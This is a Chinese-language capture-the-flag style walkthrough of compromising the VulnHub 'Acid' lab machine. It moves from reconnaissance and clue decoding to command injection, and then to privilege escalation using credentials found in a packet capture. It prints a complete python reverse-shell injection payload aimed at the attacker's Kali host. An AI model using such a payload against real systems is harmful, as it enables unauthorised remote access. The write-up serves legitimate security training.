vulnhub靶场,-Acid
环境准备
靶机下载地址:https://www.vulnhub.com/entry/acid-server,125/
攻击机:kali(192.168.109.128)
靶机:-Acid(192.168.109.149)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.149
使用nmap扫描查看目标靶机端口开放情况
开放端口:33447
但是发现这个端口是一个http端口,所以使用浏览器访问一下
可以看到网站就只有一张纯静态的图片
网站指纹识别
查看网站源码没有发现什么,但是查看网站元素时发现一串16进制编码
先使用ascii码解密,再使用base64解密
解密出来发现好像是一张图片格式,说明这个网页可能存在这张图片
试着去访问
看来应该不在这个路径下面,根据做vulnhub靶机的经验,猜测图片可能是放在了images路径下面,访问试试
猜测成功,将这张图片下载下来,使用notepad++打开看看
在最下面发现了一串奇怪的数字,猜测是ascii码,将中间的冒号全部去掉使用ascii解密
得到32位的md5值,再使用md5进行解密
得到一个五位数的数字,但是不知道到底用什么用,先放着试试
使用dirb进行网站目录结构扫描
渗透过程
使用dirb进行扫描发现了很多目录,访问Challenge/index.php
是一个登入页面,尝试使用暴力破解发现无效
访问Challenge/error.php
,页面显示发生错误
访问Challenge/include.php
这里说输入file名字,file???,瞬间想到文件包含漏洞,试一下是否真的存在
可以看到这里确实是存在文件包含漏洞的,但是没有文件上传的位置,所以还是要想想别的办法
访问Challenge/hacked.php
这里有一个输入id的功能,前面我们有一串数字还没有用过,所以在这里输入63425试试
但是好像还是没有啥用
访问Challenge/cake.php
这里提醒说还有很长的路要走,这里发现有一个问题,就是访问Challenge/cake.php
时,发现页面的title为/Magic_Box
说明可能是有这个页面的,访问试试
说的是没有权限访问这个页面,说明还是有这个页面的,再次使用dirb进行目录爆破
访问/Challenge/Magic_Box/proc
,还是没有权限访问
访问/Challenge/Magic_Box/low.php
,页面为空,访问源代码发现也为空
访问/Challenge/Magic_Box/command.php
这里说要我们输入要ping的IP地址,试一试
查看源代码发现是执行成功了的,那是不是也可以使用拼接符号执行我们想执行的命令呢,试试能不能查看当前目录下的所有文件
发现确实成功了,所以这里是存在一个命令注入漏洞的,所以可以去想办法去反弹shell了
查看目标靶机是否安装了python
可以看到安装了python,那就可以利用python去反弹一个shell了
这里显然长度是不够的,但是这里是前端验证,直接去修改他就行了
127.0.0.1;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.109.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
kali终端:
浏览器点击submit提交,可以看到kali这边成功反弹一个shell
提权过程
查看用户的sudo权限,没有密码,不让看
查看用户的suid权限,没有啥可利用的
查看当前用户的下的所有文件
发现好像有一个流量包,靶机上没有wireshark,所以把这个流量包下载到kali上面,进入/sbin/raw_vs_isi/目录,使用python创建一个临时http服务
将流量包下载到kali本地
使用wireshark打开流量包,只查找tcp协议的数据
可以看到是存在一个账号密码的
使用su命令切换到saman用户
查看用户的sudo权限,可以看到是具有全部的权限
所以直接使用sudo -i提权,成功提升为root权限,切换至其root目录,成功获得flag,至此,靶机-Acid渗透结束